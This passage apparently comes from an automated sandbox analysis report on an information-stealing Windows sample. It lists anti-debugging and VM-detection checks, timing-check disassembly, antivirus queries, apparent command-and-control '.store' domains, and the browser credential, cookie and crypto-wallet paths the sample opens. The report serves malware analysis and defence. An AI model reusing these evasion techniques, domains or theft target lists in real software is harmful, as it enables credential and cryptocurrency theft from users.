Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190D5C second address: 5190DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65E53D48C2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 call 00007F65E53D48BAh 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 popad 0x00000019 je 00007F6655CC84B4h 0x0000001f jmp 00007F65E53D48C7h 0x00000024 cmp dword ptr [ebp+08h], 00002000h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007F65E53D48C2h 0x00000034 and esi, 2BCA39F8h 0x0000003a jmp 00007F65E53D48BBh 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0759 second address: 51B075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B075F second address: 51B0781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F65E53D48BCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, ebx 0x00000016 mov di, 836Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0781 second address: 51B0787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0787 second address: 51B078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B078B second address: 51B07AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65E53D951Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B07AD second address: 51B07B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B07B3 second address: 51B07B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B07B9 second address: 51B07BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B07BD second address: 51B07E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B07E2 second address: 51B07E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B07E6 second address: 51B07EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B07EC second address: 51B07FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D48BBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B07FB second address: 51B080E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b mov ch, dl 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 movsx edx, cx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B080E second address: 51B081F instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B081F second address: 51B0825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0825 second address: 51B0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0829 second address: 51B0887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F65E53D9528h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F65E53D951Dh 0x0000001a pop ecx 0x0000001b pushfd 0x0000001c jmp 00007F65E53D9521h 0x00000021 xor ch, FFFFFFD6h 0x00000024 jmp 00007F65E53D9521h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0887 second address: 51B08B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6655CB23D1h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65E53D48BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B08B1 second address: 51B08DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65E53D951Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B08DC second address: 51B08EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D48BCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1EBBC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BF0F98 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6104Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 4796Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: file.exe, 00000000.00000002.2205471415.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107237440.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
              Source: file.exe, file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107237440.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000002.2206362809.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2205471415.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe File opened: NTICE
              Source: C:\Users\user\Desktop\file.exe File opened: SICE
              Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2205630594.0000000000BED000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: file.exe, 00000000.00000002.2206362809.00000000013C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: file.exe PID: 1532, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: file.exe String found in binary or memory: Wallets/ElectronCash
              Source: file.exe String found in binary or memory: window-state.json
              Source: file.exe String found in binary or memory: Jaxx Liberty
              Source: file.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exe String found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: file.exe, 00000000.00000003.2082337916.0000000001437000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum:
              Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: file.exe String found in binary or memory: keystore
              Source: file.exe, 00000000.00000003.2082337916.0000000001437000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live]
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
